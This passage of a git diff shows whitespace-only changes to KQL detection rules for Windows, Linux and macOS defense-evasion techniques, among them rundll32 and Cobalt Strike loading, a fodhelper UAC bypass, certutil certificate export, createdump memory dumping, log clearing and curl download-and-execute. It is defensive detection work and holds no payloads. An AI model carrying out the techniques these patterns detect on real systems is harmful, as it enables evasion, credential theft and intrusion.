+// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.011 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where ((ProcessCommandLine endswith "regasm.exe" and FolderPath endswith "\\regasm.exe") or (ProcessCommandLine endswith "regsvcs.exe" and FolderPath endswith "\\regsvcs.exe") or (ProcessCommandLine endswith "regsvr32.exe" and FolderPath endswith "\\regsvr32.exe") or (ProcessCommandLine endswith "rundll32.exe" and FolderPath endswith "\\rundll32.exe") or (ProcessCommandLine endswith "WerFault.exe" and FolderPath endswith "\\WerFault.exe")) and (not(((ProcessCommandLine endswith "rundll32.exe" and FolderPath endswith "\\rundll32.exe" and InitiatingProcessCommandLine contains "--uninstall " and (InitiatingProcessFolderPath contains "\\AppData\\Local\\BraveSoftware\\Brave-Browser\\Application\\" or InitiatingProcessFolderPath contains "\\AppData\\Local\\Google\\Chrome\\Application\\") and InitiatingProcessFolderPath endswith "\\Installer\\setup.exe") or (ProcessCommandLine endswith "rundll32.exe" and FolderPath endswith "\\rundll32.exe" and InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\EdgeUpdate\\Install\\{")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/base64_encoded_powershell_command_detected.kql b/KQL/rules/Defense Evasion/base64_encoded_powershell_command_detected.kql index e49aff2f..4cea30cb 100644 --- a/KQL/rules/Defense Evasion/base64_encoded_powershell_command_detected.kql +++ b/KQL/rules/Defense Evasion/base64_encoded_powershell_command_detected.kql 
@@ -1,12 +1,12 @@ -// Title: Base64 Encoded PowerShell Command Detected -// Author: Florian Roth (Nextron Systems) -// Date: 2020-01-29 -// Level: high -// Description: Detects usage of the "FromBase64String" function in the commandline which is used to decode a base64 encoded string -// MITRE Tactic: Defense Evasion -// Tags: attack.t1027, attack.defense-evasion, attack.execution, attack.t1140, attack.t1059.001 -// False Positives: -// - Administrative script libraries - -DeviceProcessEvents +// Title: Base64 Encoded PowerShell Command Detected +// Author: Florian Roth (Nextron Systems) +// Date: 2020-01-29 +// Level: high +// Description: Detects usage of the "FromBase64String" function in the commandline which is used to decode a base64 encoded string +// MITRE Tactic: Defense Evasion +// Tags: attack.t1027, attack.defense-evasion, attack.execution, attack.t1140, attack.t1059.001 +// False Positives: +// - Administrative script libraries + +DeviceProcessEvents | where ProcessCommandLine contains "::FromBase64String(" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/binary_padding_macos.kql b/KQL/rules/Defense Evasion/binary_padding_macos.kql index f60896e4..1bc6cb68 100644 --- a/KQL/rules/Defense Evasion/binary_padding_macos.kql +++ b/KQL/rules/Defense Evasion/binary_padding_macos.kql 
@@ -1,12 +1,12 @@ -// Title: Binary Padding - MacOS -// Author: Igor Fits, Mikhail Larin, oscd.community -// Date: 2020-10-19 -// Level: high -// Description: Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This rule detect using dd and truncate to add a junk data to file. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1027.001 -// False Positives: -// - Legitimate script work - -DeviceProcessEvents +// Title: Binary Padding - MacOS +// Author: Igor Fits, Mikhail Larin, oscd.community +// Date: 2020-10-19 +// Level: high +// Description: Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This rule detect using dd and truncate to add a junk data to file. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027.001 +// False Positives: +// - Legitimate script work + +DeviceProcessEvents | where ((ProcessCommandLine contains "if=/dev/zero" or ProcessCommandLine contains "if=/dev/random" or ProcessCommandLine contains "if=/dev/urandom") and FolderPath endswith "/dd") or (ProcessCommandLine contains "-s +" and FolderPath endswith "/truncate") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/bitlockertogo_exe_execution.kql b/KQL/rules/Defense Evasion/bitlockertogo_exe_execution.kql index 387192a4..ab552535 100644 --- a/KQL/rules/Defense Evasion/bitlockertogo_exe_execution.kql +++ b/KQL/rules/Defense Evasion/bitlockertogo_exe_execution.kql 
@@ -1,15 +1,15 @@ -// Title: BitLockerTogo.EXE Execution -// Author: Josh Nickels, mttaggart -// Date: 2024-07-11 -// Level: low -// Description: Detects the execution of "BitLockerToGo.EXE". -// BitLocker To Go is BitLocker Drive Encryption on removable data drives. This feature includes the encryption of, USB flash drives, SD cards, External hard disk drives, Other drives that are formatted by using the NTFS, FAT16, FAT32, or exFAT file system. -// This is a rarely used application and usage of it at all is worth investigating. -// Malware such as Lumma stealer has been seen using this process as a target for process hollowing. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218 -// False Positives: -// - Legitimate usage of BitLockerToGo.exe to encrypt portable devices. - -DeviceProcessEvents +// Title: BitLockerTogo.EXE Execution +// Author: Josh Nickels, mttaggart +// Date: 2024-07-11 +// Level: low +// Description: Detects the execution of "BitLockerToGo.EXE". +// BitLocker To Go is BitLocker Drive Encryption on removable data drives. This feature includes the encryption of, USB flash drives, SD cards, External hard disk drives, Other drives that are formatted by using the NTFS, FAT16, FAT32, or exFAT file system. +// This is a rarely used application and usage of it at all is worth investigating. +// Malware such as Lumma stealer has been seen using this process as a target for process hollowing. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - Legitimate usage of BitLockerToGo.exe to encrypt portable devices. + +DeviceProcessEvents | where FolderPath endswith "\\BitLockerToGo.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/browser_execution_in_headless_mode.kql b/KQL/rules/Defense Evasion/browser_execution_in_headless_mode.kql index bafc18f9..1d465f67 100644 --- a/KQL/rules/Defense Evasion/browser_execution_in_headless_mode.kql 
+++ b/KQL/rules/Defense Evasion/browser_execution_in_headless_mode.kql @@ -1,10 +1,10 @@ -// Title: Browser Execution In Headless Mode -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-09-12 -// Level: low -// Description: Detects execution of Chromium based browser in headless mode -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.command-and-control, attack.t1105, attack.t1564.003 - -DeviceProcessEvents +// Title: Browser Execution In Headless Mode +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-09-12 +// Level: low +// Description: Detects execution of Chromium based browser in headless mode +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.command-and-control, attack.t1105, attack.t1564.003 + +DeviceProcessEvents | where ProcessCommandLine contains "--headless" and (FolderPath endswith "\\brave.exe" or FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\opera.exe" or FolderPath endswith "\\vivaldi.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/bypass_uac_via_fodhelper_exe.kql b/KQL/rules/Defense Evasion/bypass_uac_via_fodhelper_exe.kql index 5636a175..d66ad7d9 100644 --- a/KQL/rules/Defense Evasion/bypass_uac_via_fodhelper_exe.kql +++ b/KQL/rules/Defense Evasion/bypass_uac_via_fodhelper_exe.kql 
@@ -1,12 +1,12 @@ -// Title: Bypass UAC via Fodhelper.exe -// Author: E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community -// Date: 2019-10-24 -// Level: high -// Description: Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 -// False Positives: -// - Legitimate use of fodhelper.exe utility by legitimate user - -DeviceProcessEvents +// Title: Bypass UAC via Fodhelper.exe +// Author: E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community +// Date: 2019-10-24 +// Level: high +// Description: Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002 +// False Positives: +// - Legitimate use of fodhelper.exe utility by legitimate user + +DeviceProcessEvents | where InitiatingProcessFolderPath endswith "\\fodhelper.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/c_il_code_compilation_via_ilasm_exe.kql b/KQL/rules/Defense Evasion/c_il_code_compilation_via_ilasm_exe.kql index faa662bb..9d20434b 100644 --- a/KQL/rules/Defense Evasion/c_il_code_compilation_via_ilasm_exe.kql +++ b/KQL/rules/Defense Evasion/c_il_code_compilation_via_ilasm_exe.kql 
@@ -1,10 +1,10 @@ -// Title: C# IL Code Compilation Via Ilasm.EXE -// Author: frack113, Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-05-07 -// Level: medium -// Description: Detects the use of "Ilasm.EXE" in order to compile C# intermediate (IL) code to EXE or DLL. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1127 - -DeviceProcessEvents +// Title: C# IL Code Compilation Via Ilasm.EXE +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-05-07 +// Level: medium +// Description: Detects the use of "Ilasm.EXE" in order to compile C# intermediate (IL) code to EXE or DLL. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1127 + +DeviceProcessEvents | where (ProcessCommandLine contains " /dll" or ProcessCommandLine contains " /exe") and (FolderPath endswith "\\ilasm.exe" or ProcessVersionInfoOriginalFileName =~ "ilasm.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/certificate_exported_via_certutil_exe.kql b/KQL/rules/Defense Evasion/certificate_exported_via_certutil_exe.kql index 2ad75a9a..21202da4 100644 --- a/KQL/rules/Defense Evasion/certificate_exported_via_certutil_exe.kql +++ b/KQL/rules/Defense Evasion/certificate_exported_via_certutil_exe.kql 
@@ -1,12 +1,12 @@
-// Title: Certificate Exported Via Certutil.EXE
-// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-02-15
-// Level: medium
-// Description: Detects the execution of the certutil with the "exportPFX" flag which allows the utility to export certificates.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1027
-// False Positives:
-// - There legitimate reasons to export certificates. Investigate the activity to determine if it's benign
-
-DeviceProcessEvents
+// Title: Certificate Exported Via Certutil.EXE
+// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-15
+// Level: medium
+// Description: Detects the execution of the certutil with the "exportPFX" flag which allows the utility to export certificates.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027
+// False Positives:
+// - There legitimate reasons to export certificates. Investigate the activity to determine if it's benign
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "-exportPFX " or ProcessCommandLine contains "/exportPFX " or ProcessCommandLine contains "–exportPFX " or ProcessCommandLine contains "—exportPFX " or ProcessCommandLine contains "―exportPFX ") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/change_winevt_channel_access_permission_via_registry.kql b/KQL/rules/Defense Evasion/change_winevt_channel_access_permission_via_registry.kql
index f4122fad..ddc96723 100644
--- a/KQL/rules/Defense Evasion/change_winevt_channel_access_permission_via_registry.kql
+++ b/KQL/rules/Defense Evasion/change_winevt_channel_access_permission_via_registry.kql
@@ -1,10 +1,10 @@
-// Title: Change Winevt Channel Access Permission Via Registry
-// Author: frack113
-// Date: 2022-09-17
-// Level: high
-// Description: Detects tampering with the "ChannelAccess" registry key in order to change access to Windows event channel.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562.002
-
-DeviceRegistryEvents
+// Title: Change Winevt Channel Access Permission Via Registry
+// Author: frack113
+// Date: 2022-09-17
+// Level: high
+// Description: Detects tampering with the "ChannelAccess" registry key in order to change access to Windows event channel.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.002
+
+DeviceRegistryEvents
 | where ((RegistryValueData contains "(A;;0x1;;;LA)" or RegistryValueData contains "(A;;0x1;;;SY)" or RegistryValueData contains "(A;;0x5;;;BA)") and RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels*" and RegistryKey endswith "\\ChannelAccess") and (not(((InitiatingProcessFolderPath endswith "\\TiWorker.exe" and InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\") or InitiatingProcessFolderPath =~ "C:\\Windows\\servicing\\TrustedInstaller.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/chmod_suspicious_directory.kql b/KQL/rules/Defense Evasion/chmod_suspicious_directory.kql
index 7662daa6..12946f6c 100644
--- a/KQL/rules/Defense Evasion/chmod_suspicious_directory.kql
+++ b/KQL/rules/Defense Evasion/chmod_suspicious_directory.kql
@@ -1,12 +1,12 @@
-// Title: Chmod Suspicious Directory
-// Author: Christopher Peacock @SecurePeacock, SCYTHE @scythe_io
-// Date: 2022-06-03
-// Level: medium
-// Description: Detects chmod targeting files in abnormal directory paths.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1222.002
-// False Positives:
-// - Admin changing file permissions.
-
-DeviceProcessEvents
+// Title: Chmod Suspicious Directory
+// Author: Christopher Peacock @SecurePeacock, SCYTHE @scythe_io
+// Date: 2022-06-03
+// Level: medium
+// Description: Detects chmod targeting files in abnormal directory paths.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1222.002
+// False Positives:
+// - Admin changing file permissions.
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "/tmp/" or ProcessCommandLine contains "/.Library/" or ProcessCommandLine contains "/etc/" or ProcessCommandLine contains "/opt/") and FolderPath endswith "/chmod"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/clear_linux_logs.kql b/KQL/rules/Defense Evasion/clear_linux_logs.kql
index 6097fa76..b7eb3b14 100644
--- a/KQL/rules/Defense Evasion/clear_linux_logs.kql
+++ b/KQL/rules/Defense Evasion/clear_linux_logs.kql
@@ -1,12 +1,12 @@
-// Title: Clear Linux Logs
-// Author: Ömer Günal, oscd.community
-// Date: 2020-10-07
-// Level: medium
-// Description: Detects attempts to clear logs on the system. Adversaries may clear system logs to hide evidence of an intrusion
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1070.002
-// False Positives:
-// - Legitimate administration activities
-
-DeviceProcessEvents
+// Title: Clear Linux Logs
+// Author: Ömer Günal, oscd.community
+// Date: 2020-10-07
+// Level: medium
+// Description: Detects attempts to clear logs on the system. Adversaries may clear system logs to hide evidence of an intrusion
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.002
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "/var/log" or ProcessCommandLine contains "/var/spool/mail") and (FolderPath endswith "/rm" or FolderPath endswith "/shred" or FolderPath endswith "/unlink")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/cmstp_execution_process_creation.kql b/KQL/rules/Defense Evasion/cmstp_execution_process_creation.kql
index f5cd1660..223ba1a2 100644
--- a/KQL/rules/Defense Evasion/cmstp_execution_process_creation.kql
+++ b/KQL/rules/Defense Evasion/cmstp_execution_process_creation.kql
@@ -1,12 +1,12 @@
-// Title: CMSTP Execution Process Creation
-// Author: Nik Seetharaman
-// Date: 2018-07-16
-// Level: high
-// Description: Detects various indicators of Microsoft Connection Manager Profile Installer execution
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.execution, attack.t1218.003, attack.g0069, car.2019-04-001
-// False Positives:
-// - Legitimate CMSTP use (unlikely in modern enterprise environments)
-
-DeviceProcessEvents
+// Title: CMSTP Execution Process Creation
+// Author: Nik Seetharaman
+// Date: 2018-07-16
+// Level: high
+// Description: Detects various indicators of Microsoft Connection Manager Profile Installer execution
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1218.003, attack.g0069, car.2019-04-001
+// False Positives:
+// - Legitimate CMSTP use (unlikely in modern enterprise environments)
+
+DeviceProcessEvents
 | where InitiatingProcessFolderPath endswith "\\cmstp.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/cmstp_execution_registry_event.kql b/KQL/rules/Defense Evasion/cmstp_execution_registry_event.kql
index 08f66879..a8ef67ad 100644
--- a/KQL/rules/Defense Evasion/cmstp_execution_registry_event.kql
+++ b/KQL/rules/Defense Evasion/cmstp_execution_registry_event.kql
@@ -1,12 +1,12 @@
-// Title: CMSTP Execution Registry Event
-// Author: Nik Seetharaman
-// Date: 2018-07-16
-// Level: high
-// Description: Detects various indicators of Microsoft Connection Manager Profile Installer execution
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.execution, attack.t1218.003, attack.g0069, car.2019-04-001
-// False Positives:
-// - Legitimate CMSTP use (unlikely in modern enterprise environments)
-
-DeviceRegistryEvents
+// Title: CMSTP Execution Registry Event
+// Author: Nik Seetharaman
+// Date: 2018-07-16
+// Level: high
+// Description: Detects various indicators of Microsoft Connection Manager Profile Installer execution
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1218.003, attack.g0069, car.2019-04-001
+// False Positives:
+// - Legitimate CMSTP use (unlikely in modern enterprise environments)
+
+DeviceRegistryEvents
 | where RegistryKey contains "\\cmmgr32.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/cobaltstrike_load_by_rundll32.kql b/KQL/rules/Defense Evasion/cobaltstrike_load_by_rundll32.kql
index 262dc233..3d9c8427 100644
--- a/KQL/rules/Defense Evasion/cobaltstrike_load_by_rundll32.kql
+++ b/KQL/rules/Defense Evasion/cobaltstrike_load_by_rundll32.kql
@@ -1,10 +1,10 @@
-// Title: CobaltStrike Load by Rundll32
-// Author: Wojciech Lesicki
-// Date: 2021-06-01
-// Level: high
-// Description: Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218.011
-
-DeviceProcessEvents
+// Title: CobaltStrike Load by Rundll32
+// Author: Wojciech Lesicki
+// Date: 2021-06-01
+// Level: high
+// Description: Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains ".dll" and (ProcessCommandLine endswith " StartW" or ProcessCommandLine endswith ",StartW")) and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE" or (ProcessCommandLine contains "rundll32.exe" or ProcessCommandLine contains "rundll32 "))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/code_execution_via_pcwutl_dll.kql b/KQL/rules/Defense Evasion/code_execution_via_pcwutl_dll.kql
index e6facada..e4e47e90 100644
--- a/KQL/rules/Defense Evasion/code_execution_via_pcwutl_dll.kql
+++ b/KQL/rules/Defense Evasion/code_execution_via_pcwutl_dll.kql
@@ -1,12 +1,12 @@
-// Title: Code Execution via Pcwutl.dll
-// Author: Julia Fomina, oscd.community
-// Date: 2020-10-05
-// Level: medium
-// Description: Detects launch of executable by calling the LaunchApplication function from pcwutl.dll library.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218.011
-// False Positives:
-// - Use of Program Compatibility Troubleshooter Helper
-
-DeviceProcessEvents
+// Title: Code Execution via Pcwutl.dll
+// Author: Julia Fomina, oscd.community
+// Date: 2020-10-05
+// Level: medium
+// Description: Detects launch of executable by calling the LaunchApplication function from pcwutl.dll library.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011
+// False Positives:
+// - Use of Program Compatibility Troubleshooter Helper
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "pcwutl" and ProcessCommandLine contains "LaunchApplication") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/codepage_modification_via_mode_com_to_russian_language.kql b/KQL/rules/Defense Evasion/codepage_modification_via_mode_com_to_russian_language.kql
index 7b0293cc..f6a05000 100644
--- a/KQL/rules/Defense Evasion/codepage_modification_via_mode_com_to_russian_language.kql
+++ b/KQL/rules/Defense Evasion/codepage_modification_via_mode_com_to_russian_language.kql
@@ -1,13 +1,13 @@
-// Title: CodePage Modification Via MODE.COM To Russian Language
-// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
-// Date: 2024-01-17
-// Level: medium
-// Description: Detects a CodePage modification using the "mode.com" utility to Russian language.
-// This behavior has been used by threat actors behind Dharma ransomware.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1036
-// False Positives:
-// - Russian speaking people changing the CodePage
-
-DeviceProcessEvents
+// Title: CodePage Modification Via MODE.COM To Russian Language
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2024-01-17
+// Level: medium
+// Description: Detects a CodePage modification using the "mode.com" utility to Russian language.
+// This behavior has been used by threat actors behind Dharma ransomware.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036
+// False Positives:
+// - Russian speaking people changing the CodePage
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains " con " and ProcessCommandLine contains " cp " and ProcessCommandLine contains " select=") and (ProcessCommandLine endswith "=1251" or ProcessCommandLine endswith "=866")) and (FolderPath endswith "\\mode.com" or ProcessVersionInfoOriginalFileName =~ "MODE.COM")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/com_object_execution_via_xwizard_exe.kql b/KQL/rules/Defense Evasion/com_object_execution_via_xwizard_exe.kql
index dbdd9d4a..89f77414 100644
--- a/KQL/rules/Defense Evasion/com_object_execution_via_xwizard_exe.kql
+++ b/KQL/rules/Defense Evasion/com_object_execution_via_xwizard_exe.kql
@@ -1,11 +1,11 @@
-// Title: COM Object Execution via Xwizard.EXE
-// Author: Ensar Şamil, @sblmsrsn, @oscd_initiative, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2020-10-07
-// Level: medium
-// Description: Detects the execution of Xwizard tool with the "RunWizard" flag and a GUID like argument.
-// This utility can be abused in order to run custom COM object created in the registry.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218
-
-DeviceProcessEvents
+// Title: COM Object Execution via Xwizard.EXE
+// Author: Ensar Şamil, @sblmsrsn, @oscd_initiative, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2020-10-07
+// Level: medium
+// Description: Detects the execution of Xwizard tool with the "RunWizard" flag and a GUID like argument.
+// This utility can be abused in order to run custom COM object created in the registry.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
 | where ProcessCommandLine =~ "RunWizard" and ProcessCommandLine matches regex "\\{[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}\\}"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/connection_proxy.kql b/KQL/rules/Defense Evasion/connection_proxy.kql
index 9ab632c3..2581351e 100644
--- a/KQL/rules/Defense Evasion/connection_proxy.kql
+++ b/KQL/rules/Defense Evasion/connection_proxy.kql
@@ -1,12 +1,12 @@
-// Title: Connection Proxy
-// Author: Ömer Günal
-// Date: 2020-06-17
-// Level: low
-// Description: Detects setting proxy configuration
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.command-and-control, attack.t1090
-// False Positives:
-// - Legitimate administration activities
-
-DeviceProcessEvents
+// Title: Connection Proxy
+// Author: Ömer Günal
+// Date: 2020-06-17
+// Level: low
+// Description: Detects setting proxy configuration
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.command-and-control, attack.t1090
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "http_proxy=" or ProcessCommandLine contains "https_proxy="
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/convertto_securestring_cmdlet_usage_via_commandline.kql b/KQL/rules/Defense Evasion/convertto_securestring_cmdlet_usage_via_commandline.kql
index 297196f1..48e23c77 100644
--- a/KQL/rules/Defense Evasion/convertto_securestring_cmdlet_usage_via_commandline.kql
+++ b/KQL/rules/Defense Evasion/convertto_securestring_cmdlet_usage_via_commandline.kql
@@ -1,12 +1,12 @@
-// Title: ConvertTo-SecureString Cmdlet Usage Via CommandLine
-// Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton
-// Date: 2020-10-11
-// Level: medium
-// Description: Detects usage of the "ConvertTo-SecureString" cmdlet via the commandline. Which is fairly uncommon and could indicate potential suspicious activity
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001
-// False Positives:
-// - Legitimate use to pass password to different powershell commands
-
-DeviceProcessEvents
+// Title: ConvertTo-SecureString Cmdlet Usage Via CommandLine
+// Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton
+// Date: 2020-10-11
+// Level: medium
+// Description: Detects usage of the "ConvertTo-SecureString" cmdlet via the commandline. Which is fairly uncommon and could indicate potential suspicious activity
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001
+// False Positives:
+// - Legitimate use to pass password to different powershell commands
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "ConvertTo-SecureString" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/createdump_process_dump.kql b/KQL/rules/Defense Evasion/createdump_process_dump.kql
index d76aab5b..bd04aae3 100644
--- a/KQL/rules/Defense Evasion/createdump_process_dump.kql
+++ b/KQL/rules/Defense Evasion/createdump_process_dump.kql
@@ -1,12 +1,12 @@
-// Title: CreateDump Process Dump
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-01-04
-// Level: high
-// Description: Detects uses of the createdump.exe LOLOBIN utility to dump process memory
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1036, attack.t1003.001, attack.credential-access
-// False Positives:
-// - Command lines that use the same flags
-
-DeviceProcessEvents
+// Title: CreateDump Process Dump
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-01-04
+// Level: high
+// Description: Detects uses of the createdump.exe LOLOBIN utility to dump process memory
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036, attack.t1003.001, attack.credential-access
+// False Positives:
+// - Command lines that use the same flags
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " -u " or ProcessCommandLine contains " --full " or ProcessCommandLine contains " -f " or ProcessCommandLine contains " --name " or ProcessCommandLine contains ".dmp ") and (FolderPath endswith "\\createdump.exe" or ProcessVersionInfoOriginalFileName =~ "FX_VER_INTERNALNAME_STR")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/creation_of_non_existent_system_dll.kql b/KQL/rules/Defense Evasion/creation_of_non_existent_system_dll.kql
index 05e178b2..15ac98c8 100644
--- a/KQL/rules/Defense Evasion/creation_of_non_existent_system_dll.kql
+++ b/KQL/rules/Defense Evasion/creation_of_non_existent_system_dll.kql
@@ -1,11 +1,11 @@
-// Title: Creation Of Non-Existent System DLL
-// Author: Nasreddine Bencherchali (Nextron Systems), fornotes
-// Date: 2022-12-01
-// Level: medium
-// Description: Detects the creation of system DLLs that are usually not present on the system (or at least not in system directories).
-// Usually this technique is used to achieve DLL hijacking.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
-
-DeviceFileEvents
+// Title: Creation Of Non-Existent System DLL
+// Author: Nasreddine Bencherchali (Nextron Systems), fornotes
+// Date: 2022-12-01
+// Level: medium
+// Description: Detects the creation of system DLLs that are usually not present on the system (or at least not in system directories).
+// Usually this technique is used to achieve DLL hijacking.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
+
+DeviceFileEvents
 | where FolderPath endswith ":\\Windows\\System32\\TSMSISrv.dll" or FolderPath endswith ":\\Windows\\System32\\TSVIPSrv.dll" or FolderPath endswith ":\\Windows\\System32\\wbem\\wbemcomn.dll" or FolderPath endswith ":\\Windows\\System32\\WLBSCTRL.dll" or FolderPath endswith ":\\Windows\\System32\\wow64log.dll" or FolderPath endswith ":\\Windows\\System32\\WptsExtensions.dll" or FolderPath endswith "\\SprintCSP.dll"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/curl_download_and_execute_combination.kql b/KQL/rules/Defense Evasion/curl_download_and_execute_combination.kql
index fc6c6297..ead43930 100644
--- a/KQL/rules/Defense Evasion/curl_download_and_execute_combination.kql
+++ b/KQL/rules/Defense Evasion/curl_download_and_execute_combination.kql
@@ -1,10 +1,10 @@
-// Title: Curl Download And Execute Combination
-// Author: Sreeman, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2020-01-13
-// Level: high
-// Description: Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218, attack.command-and-control, attack.t1105
-
-DeviceProcessEvents
+// Title: Curl Download And Execute Combination
+// Author: Sreeman, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2020-01-13
